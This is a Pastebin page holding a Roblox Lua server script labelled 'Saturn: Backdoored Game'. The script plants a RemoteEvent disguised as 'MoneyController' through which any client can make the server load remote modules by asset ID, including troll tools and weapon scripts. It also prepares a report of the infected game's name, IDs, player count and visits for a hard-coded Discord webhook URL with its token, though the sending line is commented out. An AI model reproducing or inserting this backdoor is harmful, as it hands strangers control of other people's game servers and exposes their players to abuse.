Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- wait(5)
- local http = game:GetService("HttpService")
- local repStorage = game:GetService("ReplicatedStorage")
- local Placeid = game.PlaceId
- local Gameid = game.GameId
- local url = 'https://games.rprxy.xyz/v1/games?universeIds='..Gameid
- local webhook = 'https://discordapp.com/api/webhooks/724290107775123466/gVvVt9dVfCTYadJslCIVyIndrgaeONQLAvfy0xrkywCjwT2pE9ahILXyrGwDA-FiP9md'
- local get = http:GetAsync(url)
- local name = http:JSONDecode(get).data[1].name
- local playing = http:JSONDecode(get).data[1].playing
- local visits = http:JSONDecode(get).data[1].visits
- local ss = Instance.new('RemoteEvent',game.ReplicatedStorage)
- ss.Name = "MoneyController"
- local data =
- {
- ["embeds"] = {
- {
- ["title"] = "**HTTP ENABLED**",
- ["color"] = 8757503,
- ["fields"] = {
- {
- ["name"] = "Place Name:",
- ["value"] = name,
- ["inline"] = true
- },
- {
- ["name"] = "Place ID:",
- ["value"] = Placeid,
- ["inline"] = true
- },
- {
- ["name"] = "Game ID:",
- ["value"] = Gameid,
- ["inline"] = true
- },
- {
- ["name"] = "Playing:",
- ["value"] = playing,
- ["inline"] = true
- },
- {
- ["name"] = "Visits:",
- ["value"] = visits,
- ["inline"] = true
- }
- },
- ["author"] = {
- ["name"] = "Saturn: Backdoored Game"
- }
- }
- }
- }
- wait(1)
- local newdata = http:JSONEncode(data)
- --http:PostAsync(webhook, newdata)
- ss.OnServerEvent:Connect(function(plr,exe,vanvictim)
- if exe == "Caducus" then
- require(5094589143).load(plr.Name)
- end
- if exe == "Xester" then
- require(5089514014).load(plr.Name)
- end
- if exe == "Reflux" then
- require(5094514053).load(plr.Name)
- end
- if exe == "v3" then
- require(5224263323).load(plr.Name)
- end
- if exe == "v4" then
- require(5224299828).load(plr.Name)
- end
- if exe == "johndoe" then
- require(5224321055).load(plr.Name)
- end
- if exe == "trollingui" then
- require(4588615641):Fire(plr.Name)
- end
- if exe == "starglitcher" then
- require(4756119598).load(plr.Name)
- end
- if exe == "r6" then
- require(3041175937):r6(plr.Name)
- end
- if exe == "zenith" then
- require(4849447975).load(plr.Name)
- end
- if exe == "revolver" then
- require(4063023113).Bang(plr.Name)
- end
- if exe == "machinegun" then
- require(4084843279).Machine(plr.Name)
- end
- if exe == "m1911" then
- require(4886090927).muffin(plr.Name)
- end
- if exe == "explode" then
- require(1232280447).load(plr.Name)
- end
- if exe == "van" then
- require(2973851516).load(vanvictim)
- end
- end)
Advertisement
Add Comment
Please, Sign In to add comment